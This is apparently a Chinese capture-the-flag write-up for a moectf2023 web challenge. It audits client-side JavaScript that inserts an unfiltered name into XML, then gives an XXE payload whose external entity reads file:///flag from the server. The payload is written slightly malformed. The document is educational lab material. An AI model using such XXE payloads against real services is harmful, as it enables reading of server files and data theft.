moectf2023-了解你的座驾-胎教版wp

  • 1.进入题目环境后,点击左侧即可选择展示的内容
  • 2.点击最后一个标签显示:
  • 3.看到提示flag在根目录下,先做源码审计
js 复制代码
function submitForm(name) {
			var form = document.createElement("form");
			form.method = "post";
			form.action = "index.php";

			var input = document.createElement("input");
			input.type = "hidden";
			input.name = "xml_content";
			input.value = "<xml><name>" + name + "</name></xml>";

			form.appendChild(input);
			document.body.appendChild(form);
			form.submit();
		}
  • 发现源码中的js部分处理时存在XXE漏洞:
js 复制代码
			var input = document.createElement("input");
			input.type = "hidden";
			input.name = "xml_content";
			input.value = "<xml><name>" + name + "</name></xml>";
  • 所谓XXE即xml外部实体注入,通过自定义外部实体并使用来读取文件或进行SSRF攻击。在这里参数name被直接插入到xml结构当中,没有做任何过滤,因此可以进行XXE攻击,payload如下:
    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [!ELEMENT name ANY]<!ENTITY xxe SYSTEM "file:///flag" >]><xml><name>&xxe;</name></xml>
相关推荐
RisunJan2 小时前
Linux命令-logout(安全结束当前登录会话)
linux·运维·安全
程途拾光1582 小时前
一键生成幼儿园安全疏散平面图设计美观合规又省心
论文阅读·安全·平面·毕业设计·流程图·课程设计·论文笔记
刘婉晴2 小时前
【kali渗透测试】中间人攻击
网络安全·渗透测试
lcj09246663 小时前
信创涉密载体管控系统:硬件架构与软件功能全解析(聚焦资产安全)
安全·硬件架构
毕设源码-朱学姐3 小时前
【开题答辩全过程】以 基于python网络安全知识在线答题系统为例,包含答辩的问题和答案
开发语言·python·web安全
小李独爱秋3 小时前
计算机网络经典问题透视:RTS/CTS是强制使用还是选择使用?
网络协议·计算机网络·网络安全·信息与通信·信号处理
瘾大侠3 小时前
HTB赛季10 - Facts
网络·安全·web安全·网络安全
one____dream3 小时前
Reverse-elrond32
安全·网络安全·ctf
小李独爱秋3 小时前
计算机网络经典问题透视:无线局域网MAC协议中的SIFS和DIFS究竟是什么?
网络协议·计算机网络·macos·网络安全·信息与通信·信号处理